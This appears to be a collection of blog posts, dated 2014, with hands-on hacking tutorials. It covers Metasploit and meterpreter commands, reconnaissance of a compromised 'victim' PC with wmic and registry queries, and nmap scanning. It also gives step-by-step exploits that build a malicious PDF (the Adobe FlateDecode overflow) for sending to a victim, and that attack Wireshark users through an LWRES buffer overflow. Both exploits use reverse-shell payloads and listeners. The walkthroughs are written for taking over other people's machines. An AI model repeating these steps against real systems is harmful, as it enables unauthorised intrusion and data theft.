วันอาทิตย์ที่ 2 มีนาคม พ.ศ. 2557

Forensics Investigation of Remote PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.
Now type wmic /? Displays help
wmic cpu list full – get Name, Caption, MaxClockSpeed, DeviceID, and etc status
wmic memory chip – to get get Bank Label, Capacity, Caption, Creation ClassName, DataWidth, Description, Device locator, Form Factor, HotSwappable, Install Date etc.
wmic process list full – to get Caption, CommandLine, Handle, HandleCount, PageFaults, PageFileUsage, PArentProcessId, ProcessId, ThreadCount
wmic startup – to get Caption, Location, Command
wmic bios – get name, version, serial number
wmic bootconfig – get BootDirectory, Caption, TempDirectory, Lastdrive
wmic startup – get Caption, Location, Command
wmic useraccount – get Account Type, Description, Domain, Disabled, Local Account, Lockout, Password Changeable, Password Expires, Password Required, SID
wmic driver – get Caption, Name, PathName, ServiceType, State, Status
wmic share – get name, path, status

baseboardget Manufacturer, Model, Name, PartNumber, slotlayout, serialnumber, poweredon
cdromget Name, Drive, Volumename
computersystemget Name, domain, Manufacturer, Model, NumberofProcessors, PrimaryOwnerName,Username, Roles, totalphysicalmemory /format:list
datafilewhere name=’c:\\boot.ini’ get Archive, FileSize, FileType, InstallDate, Readable, Writeable, System, Version
dcomappget Name, AppID /format:list
desktopget Name, ScreenSaverExecutable, ScreenSaverActive, Wallpaper /format:list
desktopmonitorget screenheight, screenwidth
diskdriveget Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType
diskquotaget User, Warninglimit, DiskSpaceUsed, QuotaVolume
environmentget Description, VariableValue
fsdirwhere name=’c:\\windows’ get Archive, CreationDate, LastModified, Readable, Writeable, System, Hidden, Status
groupget Caption, InstallDate, LocalAccount, Domain, SID, Status
idecontrollerget Name, Manufacturer, DeviceID, Status
irqget Name, Status
jobget Name, Owner, DaysOfMonth, DaysOfWeek, ElapsedTime, JobStatus, StartTime, Status
loadorderget Name, DriverEnabled, GroupOrder, Status
logicaldiskget Name, Compressed, Description, DriveType, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName
memcacheget Name, BlockSize, Purpose, MaxCacheSize, Status
memlogicalget AvailableVirtualMemory, TotalPageFileSpace, TotalPhysicalMemory, TotalVirtualMemory
memphysicalget Manufacturer, Model, SerialNumber, MaxCapacity, MemoryDevices
netclientget Caption, Name, Manufacturer, Status
netloginget Name, Fullname, ScriptPath, Profile, UserID, NumberOfLogons, PasswordAge, LogonServer, HomeDirectory, PrimaryGroupID
netprotocolget Caption, Description, GuaranteesSequencing, SupportsBroadcasting, SupportsEncryption, Status
netuseget Caption, DisplayType, LocalName, Name, ProviderName, Status
nicget AdapterType, AutoSense, Name, Installed, MACAddress, PNPDeviceID,PowerManagementSupported, Speed, StatusInfo
nicconfigget MACAddress, DefaultIPGateway, IPAddress, IPSubnet, DNSHostName, DNSDomain
ntdomainget Caption, ClientSiteName, DomainControllerAddress, DomainControllerName, Roles, Status
nteventwhere (LogFile=’system’ and SourceName=’W32Time’) get Message, TimeGenerated
onboarddeviceget Description, DeviceType, Enabled, Status
osget Version, Caption, CountryCode, CSName, Description, InstallDate, SerialNumber, ServicePackMajorVersion, WindowsDirectory /format:list
pagefileget Caption, CurrentUsage, Status, TempPageFile
pagefilesetget Name, InitialSize, MaximumSize
partitionget Caption, Size, PrimaryPartition, Status, Type
printerget DeviceID, DriverName, Hidden, Name, PortName, PowerManagementSupported, PrintJobDataType, VerticalResolution, Horizontalresolution
printjobget Description, Document, ElapsedTime, HostPrintQueue, JobID, JobStatus, Name, Notify, Owner, TimeSubmitted, TotalPages
productget Description, InstallDate, Name, Vendor, Version
qfeget description, FixComments, HotFixID, InstalledBy, InstalledOn, ServicePackInEffect
quotasettingget Caption, DefaultLimit, Description, DefaultWarningLimit, SettingID, State
recoverosget AutoReboot, DebugFilePath, WriteDebugInfo, WriteToSystemLog
Registryget CurrentSize, MaximumSize, ProposedSize, Status
scsicontrollerget Caption, DeviceID, Manufacturer, PNPDeviceID
serverget ErrorsAccessPermissions, ErrorsGrantedAccess, ErrorsLogon, ErrorsSystem, FilesOpen, FileDirectorySearches
serviceget Name, Caption, State, ServiceType, StartMode, pathname
sounddevget Caption, DeviceID, PNPDeviceID, Manufacturer, status
sysaccountget Caption, Domain, Name, SID, SIDType, Status
systemenclosureget Caption, Height, Depth, Manufacturer, Model, SMBIOSAssetTag, AudibleAlarm, SecurityStatus, SecurityBreach, PoweredOn, NumberOfPowerCords
systemslotget Number, SlotDesignation, Status, SupportsHotPlug, Version, CurrentUsage, ConnectorPinout
tapedriveget Name, Capabilities, Compression, Description, MediaType, NeedsCleaning, Status, StatusInfo
timezoneget Caption, Bias, DaylightBias, DaylightName, StandardName

How to Find System Boot Time and Install Original Date

Systeminfo – Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, and product ID, and hardware properties, such as RAM, disk space, and network cards.

How to Detect Last Connected USB

Reg query hklm\system\CurrentControlSet\Enum\usbstor

How to View Recent Visit Documents


How to View Last Used Command in Run Dialog Box

reg query hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

How to View Installed software

Reg query hkcu/software

How to Find the All installed Drivers

Driverquery – Displays a list of all installed device drivers and their properties.

วันเสาร์ที่ 1 มีนาคม พ.ศ. 2557

Metasploit Tutorial for Beginners

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.
Metasploit helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.

Minimum System Requirements:
  • 2 GHz+ processor
  • 2 GB RAM available (4 GB recommended, increase accordingly with VM targets on the same device)
  • 500MB+ available disk space
  • 10/100 Mbps network interface card
Supported Operating Systems:
  • Windows XP, 2003, Vista, 2008 Server, and Windows 7
  • Red Hat Enterprise Linux 5.x, 6.x – x86 and x86_64
  • Ubuntu Linux 8.04, 10.04 – x86 and x86_64
Required Browser Versions
  • Mozilla Firefox 4.0+
  • Microsoft Internet Explorer 9
  • Google Chrome 10+

Basics Terms of Metasploit

Vulnerability: Vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. Vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
Exploit“Exploit” refers to a well-known bug/hole that hackers can use to gain entry into the system.To take advantage of vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system. 
Payload: A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit.

Metasploit Basic Command Tutorial


Help:  it will show you the basic commands of Metasploit.

Show payloads
Show payloads:  it will show you all the available payloads on Metasploit.

Show exploits
Show exploits: it will show you all exploits in Metasploit.

msf> use <exploit> to use a exploit or payload
msf exploit (name)> set payload <paload name>To add specified payload
msf exploit (name)> set rhost <victim ip>To add victim ip address to specified exploit#
msf exploit (name)> set lhost <localhost ip>To add attacker ip address to specified exploit#
msf exploit (name)> unset rhostTo remove rhost value
msf exploit (name)> unset lhostTo remove lhost value
msf exploit (name)> setg rhost <victim ip>To add victim ip address globally
msf exploit (name)> setg lhost <localhost>To add localhost(attacker) ip address globally
msf exploit (name)> sessions -l -vTo see list of sessions

Meterpreter Basic Commands


The ‘help’ command, as may be expected, displays the Meterpreter help menu.


The ‘ps’ command displays a list of running processes on the target.


As in Linux, the ‘ls’ command will list the files in the current remote directory.


The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.


Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.


The ‘download’ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.


As with the ‘download’ command, you need to use double-slashes with the ‘upload’ command.


The ‘shell’ command will present you with a standard shell on the target system.

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
How to Hack Remote PC using PDF
Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02
Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flatedecode_predictor02)>show options
How to Hack Remote PC using PDF
Msf exploit (adobe_flatedecode_predictor02)>set lhost (IP of Local Host)
Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf
Msf exploit (adobe_flatedecode_predictor02)>exploit
After we successfully generate the malicious PDF, it will stored on your local computer
How to Hack Remote PC using PDF
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
How to Hack Remote PC using PDF

Attacking on Remote PC if Victim is using Wireshark

Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
Exploit Targets
0 – tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
1 – wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
2 – wireshark 1.2.5 on RHEL 5.4 (x64)
3 – wireshark 1.2.5 on Mac OS X 10.5 (x86)
4 – wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
Msf exploit (wireshark_lwres_getaddrbyname_loop)>set payload windows/shell_reverse_tcp
Msf exploit (wireshark_lwres_getaddrbyname_loop)>set lhost (IP of Local Host)
Msf exploit (wireshark_lwres_getaddrbyname_loop)>exploit
Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

How to use Nmap (Beginner Tutorial)

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime
First Download nmap From Here and install in your pc

How to Detect All Connected PC in Network

nmap -sn

How to Scan Network Exclude a Specific Host

nmap –exclude

How to Detect Installed OS in Remote PC

nmap -O

How to Scan All TCP Port in All Remote PC

nmap -sT

How to Scan All UDP Ports in Remote PC

nmap -sU

How to Scan IP Protocol

nmap -sO

How to Detect services of Remote PC

nmap -sV

How to Scan Name Server of Website

nmap -sV -T4 -F www.upscportal.in